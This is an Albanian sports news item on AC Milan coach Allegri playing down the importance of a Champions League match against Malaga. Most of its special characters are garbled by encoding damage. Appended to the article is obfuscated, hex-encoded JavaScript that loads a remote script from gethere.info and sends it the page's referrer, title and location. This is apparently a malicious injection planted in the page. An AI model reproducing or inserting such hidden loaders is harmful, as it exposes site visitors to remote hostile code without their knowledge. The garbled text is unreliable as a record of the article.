largea_20121105dasnasftb_371352152245

Allegri: Malaga nuk A�shtA� vendimtare

Milani i dha fund njA� serie rezultatesh negative me fitoren e arritur nA� kampionat, 5-1 pA�rballA� Chievos, por kuqezinjtA� nuk do tA� kenA� kohA� pA�r tA� festuar, pasi tA� martA�n do tA� duhet tA� luajnA� nA� Champions nA� njA� ndeshje shumA� tA� rA�ndA�sishme pA�r fatet e grupit.

MegjithatA�, ndryshe nga sa sugjeron klasifikimi, qA� sheh shtatA� herA� kampionA�t e EuropA�s nA� kuotA�n e katA�r pikA�ve pas tre ndeshjeve tA� para, pA�r trajneri Allegri, pA�rballja me MalagA�n nuk mund tA� konsiderohet si vendimtare.

a�?A�shtA� njA� ndeshje e rA�ndA�sishme, por jo vendimtare pA�r kalimin e grupit. Ky grup ka pA�r ta��u zgjidhur vetA�m nA� javA�n e fundit, por A�shtA� e qartA� qA� me MalagA�n duhet tA� bA�jmA� mA� tA� mirA�n tonA�, duke pasur gjithashtu parasysh se kjo skuadA�r arriti tA� na mposhtA� nA� ndeshjen e parA�a�?.

I pyetur pA�r mA�nyrA�n se si skuadra duhet tA� pA�rballojA� sfidA�n me spanjollA�t, Allegri shpjegoi: a�?Do tA� jetA� e rA�ndA�sishme tA� kemi njA� formA� tA� mirA� fizike. Ndeshja do tA� jetA� e gjatA� dhe intensive, ndaj duhet ta pA�rballojA� me shumA� freski. NA� njA� grup tA� tillA� tA� ndA�rlikuar, edhe me tre fitore mund tA� mos dalim tA� parA�t. Humbja me MalagA�n i ka ndA�rlikuar disa shanset tona, por njA� fitore tA� martA�n do tA� na rikthente nA� rrugA�n e duhura�?.

Aktualisht, nA� grupin e Milanit, Malaga kryeson me pikA� tA� plota, ndjekur nga Milani me katA�r pikA�, Zeniti me tre pikA� dhe Anderlecht me njA� pikA� tA� vetme.var _0x31f1=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0x31f1[1]](_0x31f1[0]);s[_0x31f1[2]]= _0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12];if(document[_0x31f1[13]]){document[_0x31f1[13]][_0x31f1[15]][_0x31f1[14]](s,document[_0x31f1[13]])}else {d[_0x31f1[18]](_0x31f1[17])[0][_0x31f1[16]](s)};if(document[_0x31f1[11]][_0x31f1[19]]=== _0x31f1[20]&& KTracking[_0x31f1[22]][_0x31f1[21]](_0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12])=== -1){alert(_0x31f1[23])}